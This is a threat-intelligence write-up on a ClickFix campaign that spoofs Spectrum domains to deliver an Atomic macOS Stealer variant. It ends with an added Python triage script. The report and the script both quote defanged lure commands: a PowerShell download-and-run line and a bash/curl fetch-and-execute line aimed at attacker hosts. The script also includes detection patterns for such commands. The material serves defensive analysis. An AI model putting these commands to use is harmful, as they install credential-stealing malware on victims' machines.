CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.
A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typosquatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign uses the ClickFix technique and serves different payloads depending on the victim's operating system: macOS users receive a malicious shell script designed to steal the system password and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute the malicious binary. Russian-language comments in the source code suggest the involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. The campaign is part of a growing trend of multi-platform social-engineering attacks targeting both consumer and corporate users.
During our routine attacker-infrastructure discovery and attribution cycle, we discovered a number of ClickFix-themed delivery websites typosquatting Spectrum, a US-based company providing cable television, internet access, internet security, managed services, mobile phone, and unified communications services.
When the victim clicks "Alternative Verification", a command is copied to the clipboard and instructions are displayed telling the victim to paste and run it, as in any other ClickFix campaign.
On closer investigation, however, we found that the website returned different responses depending on the User-Agent header of the request.
Clipboard - Non macOS useragent
powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
This is the delivery method most commonly seen in Windows ClickFix campaigns. The trailing "#" comment, padded with invisible Hangul Filler characters (U+3164), is the part the victim sees in the Run dialog after pasting; the PowerShell command in front of it sits out of view.
Clipboard - macOS useragent
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.
/bin/bash -c "...": runs the quoted string as a command in a new Bash process.
curl -fsSL <URL>: fetches the URL with -f (fail silently on HTTP errors, so an error page is not handed to Bash as a script), -s (silent, no progress meter), -S (still show errors despite -s) and -L (follow redirects).
Because the curl call sits inside $(...), the victim's shell runs it first and substitutes the downloaded text as the argument to bash -c. The install.sh script is therefore executed straight from memory: it is never written to disk, so there is nothing for the user to inspect before it runs.
Contents of install.sh
Analysing the file the script saves as "update" in the /tmp directory, we found that the malware belongs to the Atomic macOS Stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey have been seen in the wild recently and are gaining traction among cybercriminals.
Following CloudSEK's disclosure of their tactics and infrastructure, the threat actor shifted to a new distribution method: malicious advertisements for counterfeit GitHub repositories aimed at developers who use Homebrew (h/t Jérôme Segura, Malwarebytes).
The observed attack sequence mirrors the case investigated above: a deceptive script (install.sh) fetches an "update" payload that is a variant of AMOS. The infection process unfolds as follows:
On 6th June 2025, the threat actor created the fake “Homebrew” repository.
These commits were simply being made to replace old command and control servers with the new ones.
As the commit history shows, the threat actor removed their existing C2 and substituted the legitimate Homebrew installer path on raw.githubusercontent.com, likely to lend the repository authenticity for malvertising.
Later, the legitimate URL was replaced with attacker-controlled C2s. All IOCs from the repository have been added to the table at the end of this report.
While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian-speaking cybercriminals. Using these comments as a pivot, along with other HTTP parameters, we were able to identify IOFAs (Indicators of Future Attack) in addition to the IOCs.
The delivery pages for this AMOS variant campaign contained bugs in both their server-side and front-end logic: Linux User-Agents were served the PowerShell command, and the instruction "Press & hold the Windows Key + R" was displayed to both Windows and macOS users.
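As an added example (not CloudSEK's tooling and not code from the delivery pages), the following Python script triages ClickFix clipboard payloads along the lines of the observations above: it classifies the execution primitive, compares the OS the command targets with the OS the User-Agent claimed (catching the Linux/PowerShell mismatch), extracts every fetched URL and checks it against an assumed allowlist that contains only the genuine Homebrew installer path, and counts the invisible Hangul Filler padding that hides the command behind the "Cloudflare" comment. The two malicious sample commands are the ones quoted in this report, with defanged URLs; the Homebrew control command is constructed.

```python
"""Triage ClickFix clipboard payloads by the OS they were served to.

Added example (not CloudSEK's tooling). Input: the text a lure page copies to
the clipboard plus the OS implied by the User-Agent that received it. Output:
the execution primitive, the OS the command really targets (flagging the
served/target mismatch the report describes), every fetched URL checked
against an assumed allowlist, and invisible padding characters used to hide
the command behind a trailing '#' comment.
"""
import re
import unicodedata
from dataclasses import dataclass, field

# Invisible characters used as padding in ClickFix lures. U+3164 (Hangul
# Filler) is the one in the Spectrum lure's PowerShell command.
PADDING_CHARS = {"\u3164", "\u115f", "\u1160", "\u200b", "\u200c", "\u200d",
                 "\u2060", "\ufeff"}

# Assumed allowlist of fetch-and-exec sources an organisation trusts. The
# official Homebrew installer is the only entry; the fake repository in the
# report briefly pointed at it before swapping in attacker C2s.
TRUSTED_URL_PREFIXES = (
    "https://raw.githubusercontent.com/Homebrew/install/",
)

URL_RE = re.compile(r"https?://[^\s'\")]+")


@dataclass
class Verdict:
    primitive: str
    target_os: str
    served_os: str
    urls: list = field(default_factory=list)
    findings: list = field(default_factory=list)


def refang(text: str) -> str:
    """Undo the [.] / hxxp defanging used in reports so URLs parse."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def classify_primitive(cmd: str):
    """Return (primitive name, set of OSes the primitive can run on)."""
    if re.search(r"\bpowershell\b", cmd, re.I) and \
            re.search(r"Invoke-WebRequest|\biwr\b|\birm\b|DownloadString", cmd, re.I):
        return "powershell-download-and-run", {"windows"}
    if re.search(r'/bin/bash\s+-c\s+"\$\(curl', cmd) or \
            re.search(r"curl[^|]*\|\s*(ba)?sh\b", cmd):
        return "bash-curl-exec", {"macos", "linux"}
    return "unknown", set()


def triage(clipboard_text: str, served_os: str) -> Verdict:
    cmd = refang(clipboard_text)
    primitive, targets = classify_primitive(cmd)
    v = Verdict(primitive, "/".join(sorted(targets)) or "unknown", served_os)

    # The lure served PowerShell to Linux user agents: a delivery-logic bug.
    if targets and served_os not in targets:
        v.findings.append(f"os-mismatch: served to {served_os}, targets {v.target_os}")

    for url in URL_RE.findall(cmd):
        v.urls.append(url)
        if not url.startswith(TRUSTED_URL_PREFIXES):
            v.findings.append(f"untrusted-source: {url}")

    if re.search(r"-ExecutionPolicy\s+Bypass", cmd, re.I):
        v.findings.append("execution-policy-bypass")

    # Invisible padding after '#' pushes the real command out of the visible
    # part of the Run dialog, leaving only the 'Cloudflare' comment on screen.
    pad = [ch for ch in cmd if ch in PADDING_CHARS]
    if pad:
        names = sorted({unicodedata.name(ch, "U+%04X" % ord(ch)) for ch in pad})
        v.findings.append(f"invisible-padding: {len(pad)} chars ({', '.join(names)})")
    return v


# Commands quoted in the report (defanged as printed there). The run of
# Hangul Filler characters after 'Cloudflare' is written as escapes.
WINDOWS_CMD = (
    "powershell -NoProfile -ExecutionPolicy Bypass -Command "
    "\"$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); "
    "Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file\""
    " # \u3164Cloudflare" + "\u3164" * 19
)
MACOS_CMD = (
    '/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"'
    " # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025."
)
# Constructed benign control: the genuine Homebrew one-liner.
HOMEBREW_CMD = ('/bin/bash -c "$(curl -fsSL '
                'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')


def run_samples() -> list:
    """The served-OS / payload pairs the report observed, plus the control."""
    return [triage(WINDOWS_CMD, "windows"), triage(WINDOWS_CMD, "linux"),
            triage(MACOS_CMD, "macos"), triage(HOMEBREW_CMD, "macos")]


if __name__ == "__main__":
    for v in run_samples():
        print(f"[{v.served_os} -> {v.primitive} ({v.target_os})]")
        for f in v.findings or ["no findings"]:
            print("   ", f)
```

Run it as-is to see the four verdicts; in practice the input would come from a clipboard-monitoring agent or from fetching the lure page with several User-Agent values, and the allowlist would be extended with whatever fetch-and-exec installers the organisation genuinely uses.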